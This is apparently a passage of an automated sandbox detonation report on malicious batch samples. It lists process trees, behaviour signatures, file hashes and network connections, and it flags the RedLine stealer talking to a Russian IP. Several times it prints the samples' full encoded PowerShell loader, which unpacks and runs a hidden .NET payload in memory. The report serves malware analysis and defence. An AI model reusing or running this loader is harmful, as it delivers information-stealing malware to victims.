"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgACMAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAjACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/1764-6-0x000000007514E000-0x000000007514F000-memory.dmp
memory/1764-7-0x0000000004760000-0x0000000004796000-memory.dmp
memory/1764-8-0x0000000004DD0000-0x00000000053F8000-memory.dmp
memory/1764-9-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/1764-10-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/1764-11-0x0000000004C10000-0x0000000004C32000-memory.dmp
memory/1764-12-0x0000000004CC0000-0x0000000004D26000-memory.dmp
memory/1764-13-0x0000000005400000-0x0000000005466000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vl3b3ya.ubb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1764-23-0x00000000055F0000-0x0000000005944000-memory.dmp
memory/1764-24-0x0000000005B10000-0x0000000005B2E000-memory.dmp
memory/1764-25-0x0000000005B40000-0x0000000005B8C000-memory.dmp
memory/1764-26-0x0000000007250000-0x00000000078CA000-memory.dmp
memory/1764-27-0x0000000006040000-0x000000000605A000-memory.dmp
memory/1764-28-0x0000000006DD0000-0x0000000006F72000-memory.dmp
memory/1764-29-0x0000000006F70000-0x000000000706A000-memory.dmp
memory/1764-30-0x00000000060F0000-0x000000000610A000-memory.dmp
memory/1764-31-0x0000000007170000-0x0000000007202000-memory.dmp
memory/4904-32-0x0000000000400000-0x0000000000430000-memory.dmp
memory/4904-35-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4904-36-0x0000000005930000-0x0000000005ED4000-memory.dmp
memory/4904-37-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4904-38-0x00000000065D0000-0x0000000006662000-memory.dmp
memory/4904-39-0x00000000067B0000-0x00000000067BA000-memory.dmp
memory/1764-40-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4904-41-0x0000000006860000-0x00000000068B0000-memory.dmp
memory/4904-42-0x0000000006A80000-0x0000000006C42000-memory.dmp
memory/4904-43-0x0000000075140000-0x00000000758F0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win7-20240903-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAG54KgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwBueCcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
| MD5 | 92f44e405db16ac55d97e3bfe3b132fa |
| SHA1 | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d |
| SHA256 | 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7 |
| SHA512 | f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f |
memory/2764-4-0x0000000074171000-0x0000000074172000-memory.dmp
memory/2764-5-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-7-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-8-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-6-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-9-0x0000000074170000-0x000000007471B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win10v2004-20241007-en
Max time kernel
137s
Max time network
147s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3472 set thread context of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAG54KgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwBueCcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | tcp | |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | tcp | |
| RU | 89.23.97.206:48135 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | tcp | |
| RU | 89.23.97.206:48135 | tcp | |
| RU | 89.23.97.206:48135 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/3472-4-0x00000000744CE000-0x00000000744CF000-memory.dmp
memory/3472-5-0x0000000002D00000-0x0000000002D36000-memory.dmp
memory/3472-6-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/3472-8-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/3472-7-0x00000000053D0000-0x00000000059F8000-memory.dmp
memory/3472-9-0x0000000005300000-0x0000000005322000-memory.dmp
memory/3472-10-0x0000000005A00000-0x0000000005A66000-memory.dmp
memory/3472-11-0x0000000005A70000-0x0000000005AD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emmkcsqh.hdo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3472-17-0x0000000005BA0000-0x0000000005EF4000-memory.dmp
memory/3472-22-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/3472-23-0x0000000006270000-0x00000000062BC000-memory.dmp
memory/3472-25-0x00000000072D0000-0x00000000072EA000-memory.dmp
memory/3472-24-0x0000000007B20000-0x000000000819A000-memory.dmp
memory/3472-26-0x00000000074A0000-0x00000000075E4000-memory.dmp
memory/3472-27-0x0000000007370000-0x0000000007464000-memory.dmp
memory/3472-28-0x00000000076E0000-0x00000000076F4000-memory.dmp
memory/3472-29-0x0000000007700000-0x0000000007792000-memory.dmp
memory/1312-30-0x0000000000400000-0x0000000000428000-memory.dmp
memory/1312-33-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/1312-34-0x0000000007AC0000-0x00000000080D8000-memory.dmp
memory/1312-35-0x0000000007520000-0x0000000007532000-memory.dmp
memory/1312-36-0x0000000007690000-0x000000000779A000-memory.dmp
memory/1312-37-0x00000000075C0000-0x00000000075FC000-memory.dmp
memory/1312-38-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/3472-39-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/1312-40-0x00000000744C0000-0x0000000074C70000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win7-20241010-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
